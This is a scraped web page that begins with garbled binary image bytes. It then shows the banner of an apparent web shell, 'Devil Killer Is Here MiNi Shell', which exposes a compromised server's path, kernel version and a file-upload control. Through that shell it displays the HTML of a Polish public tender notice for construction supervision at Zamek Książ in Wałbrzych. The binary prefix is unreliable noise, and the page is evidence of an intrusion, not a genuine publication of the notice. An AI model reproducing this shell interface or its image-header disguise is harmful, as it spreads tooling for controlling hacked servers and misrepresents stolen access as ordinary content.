JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241010/0054084901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Nadzór Techniczny Inwestora przy realizacji przez Zamek Książ w Wałbrzychu <br/>Sp. z o.o. 4 zadań inwestycyjnych w ramach projektu Via botanica </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zamek Książ w Wałbrzychu Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890011550</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piastów Śląskich 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wałbrzych</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-306</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@ksiaz.walbrzych.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ksiaz.walbrzych.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Nadzór Techniczny Inwestora przy realizacji przez Zamek Książ w Wałbrzychu <br/>Sp. z o.o. 4 zadań inwestycyjnych w ramach projektu Via botanica </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0dcf5d77-780e-440f-86d7-feb6a0d7f9b1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00540849</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00458190/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Nadzór Techniczny Inwestora przy realizacji przez Zamek Książ w Wałbrzychu Sp. z o.o. 4 zadań inwestycyjnych w ramach projektu Via botanica</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Via botanica” (nr CZ.11.02.01/00/23_004/0000057) realizowany w ramach projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Interreg V-A Republika Czeska – Polska. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gminawalbrzych.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja między Zamawiającym, <br/>a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej. Komunikacja między Zamawiającym a Wykonawcami,<br/> w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane <br/>są w postaci elektronicznej za pośrednictwem Platformy pod adresem:<br/> https://gminawalbrzych.logintrade.net/rejestracja/ustawowe.html w wierszu oznaczonym tytułem oraz znakiem sprawy zgodnym z<br/> niniejszym postepowaniem.<br/> Zamawiający wyznacza Panią Agnieszkę Haslette do kontaktowania się z Wykonawcami. W szczególnie uzasadnionych<br/> przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy, Zamawiający dopuszcza<br/> komunikację za pomocą poczty elektronicznej na adres e-mail: haslette@ksiaz.walbrzych.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z zapisami SWZ:<br/> Instrukcja korzystania z platformy:<br/> − jeśli Wykonawca ma konto na platformie - należy się zalogować, na dole strony <br/>z postępowaniem wybrać opcję „złóż”, wyświetli się strona umożliwiająca oddanie plików składających się na ofertę, po wybraniu<br/> wszystkich plików należy wybrać opcję „wyślij”, prawidłowość złożenia oferty będzie potwierdzona właściwym komunikatem. Za datę<br/> złożenia oferty rozumie się datę jej wpływu na platformę, określoną jako: „data złożenia oferty”,<br/> − jeśli Wykonawca nie ma konta na platformie w celu jego stworzenia należy na dole strony z postępowaniem przejść do opcji<br/> „rejestracja w bazie wykonawców”,<br/> − jeśli Wykonawca nie ma konta na platformie i chce złożyć ofertę bez logowania na dole strony z postępowaniem należy wybrać<br/> opcję „złóż ofertę bez logowania”, zostanie wyświetlona strona z formularzem do wprowadzenia danych, a po przejściu „dalej”<br/> wyświetli się strona umożliwiająca dodanie oferty, po załadowaniu wszystkich plików należy wprowadzić adres e-mail, na który<br/> zostanie wysłane potwierdzenie oraz wybrać „wyślij”. Powyższa operacja nie skutkuje przekazaniem oferty, aby Zamawiający<br/> otrzymał ofertę należy zalogować się na pocztę i w otrzymanej wiadomości potwierdzić wysłanie oferty poprzez przycisk<br/> „potwierdzam”. Dopiero po dokonaniu jest czynności oferta zostanie przekazana do Zamawiającego.<br/> − szczegółowe instrukcje dla Wykonawców dotyczące zadawania pytań do postępowania, składanie ofert, wysyłania korespondencji<br/> czy rejestracji w prowadzonym postępowaniu są dostępne na platformie pod adresem:<br/> https://gminawalbrzych.logintrade.net/rejestracja/ustawowe.html<br/> − przesyłanie dokumentów na wezwanie Zamawiającego odbywa się na platformie za pośrednictwem zakładki „Korespondencja”.<br/> Zalecenia Zamawiającego odnoście podpisu oferty:<br/> Oferta musi być złożona za pośrednictwem Platformy Przetargowej w formie elektronicznej lub postaci elektronicznej, podpisana<br/> kwalifikowanym podpisem<br/> elektronicznym, profilem zaufanym lub osobistym:<br/> − odnośnie do kwalifikowanego podpisu elektronicznego: w przypadku pliku .pdf zaleca się podpis formatem PAdES, dokumenty<br/> inne niż w formie .pdf zaleca się podpisywać formatem XAdES,<br/> − odnośnie do profilu zaufanego: dostępny format podpisu .xml, plik nie może przekraczać 10 MB,<br/> − odnośnie do podpisu osobistego: dla dokumentów w formie .pdf lub .xml zaleca się podpis wewnętrzny „otoczony”, dokumenty w<br/> formacie innym niż .pdf zaleca się podpisywać podpisem zewnętrznym lub otaczającym.<br/> Niezbędne wymagania sprzętowo-aplikacyjne:<br/> a) dopuszczalne przeglądarki internetowe:<br/> − Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer II,<br/> − Microsoft Edge,<br/> − Google Chrome 31,<br/> − Mozilla Firefox 26,<br/> − Opera 18.<br/> b) pozostałe wymagania techniczne:<br/> − dostęp do sieci Internet;<br/> − obsługa przez przeglądarkę protokołu XMLHttpRequest- ajax;<br/> − włączona obsługa JavaScript;<br/> − zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/> − zainstalowany Acrobat Reader;<br/> − zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6<br/> − Update 24 lub nowszy.<br/> Ofertę pod rygorem nieważności, składa się:- w formie elektronicznej, tj. postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym przez osobę/osoby<br/> upoważnioną/upoważnione do reprezentowania odpowiednio wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie<br/> zamówienia<br/> lub- w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione<br/> do reprezentowania odpowiednio wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia<br/> Z uwzględnieniem rodzaju przekazywanych danych <br/>za pośrednictwem Platformy dostępnej pod adresem: https://gminawalbrzych.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 i art. 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	administratorem Pani/Pana danych osobowych jest Zamek Książ w Wałbrzychu Sp. z o.o., ul. Piastów Śląskich 1 ,58-306 Wałbrzych,<br/>2)	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@ksiaz.walbrzych.pl, tel. +48 74 66 43 851,<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn: „Nadzór Techniczny Inwestora przy realizacji przez Zamek Książ <br/>w Wałbrzychu Sp z o.o. 4 zadań inwestycyjnych w ramach projektu Via botanica”, prowadzonym w trybie podstawowym o jakim stanowi art. 275 pkt 1 p.z.p.,<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 p.z.p.,<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p. przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego,<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>8)	posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (zgłoszenie żądania ograniczenia przetwarzania nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania; w przypadku wniesienia żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO);<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>[...]</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/44/08/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa polegająca na świadczeniu usługi nadzoru technicznego inwestorskiego nad robotami budowlanymi dot. wykonania zadań inwestycyjnych, realizowanych przez Zamawiającego w ramach projektu VIA BOTANICA:<br/>Część 1.: Rewaloryzacja i renaturyzacja zbiornika wodnego zlokalizowanego w parku przy Zamku Książ w Wałbrzychu z kanalizacją wody opadowej z Alei Lipowej i odtworzeniem jej nawierzchni. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa polegająca na świadczeniu usługi nadzoru technicznego inwestorskiego nad robotami budowlanymi dot. wykonania zadań inwestycyjnych, realizowanych przez Zamawiającego w ramach projektu VIA BOTANICA<br/>Część 2.:	Remont i adaptacja pomieszczeń byłego baru Daisy na potrzeby nowego Centrum Informacji Turystycznej Zamku Książ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa polegająca na świadczeniu usługi nadzoru technicznego inwestorskiego nad robotami budowlanymi dot. wykonania zadań inwestycyjnych, realizowanych przez Zamawiającego w ramach projektu VIA BOTANICA<br/>Część 3.:	Rewaloryzacja Tarasu Wejściowego wraz z pracami konserwatorskimi muru południowego przy budynku nr 3 Hotelu Książ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa polegająca na świadczeniu usługi nadzoru technicznego inwestorskiego nad robotami budowlanymi dot. wykonania zadań inwestycyjnych, realizowanych przez Zamawiającego w ramach projektu VIA BOTANICA<br/>Część 4.:	Toalety ogólnodostępne na działce nr 41 w zespole Zamek Książ w Wałbrzychu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga posiadania przez Wykonawcę ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem Zamówienia na 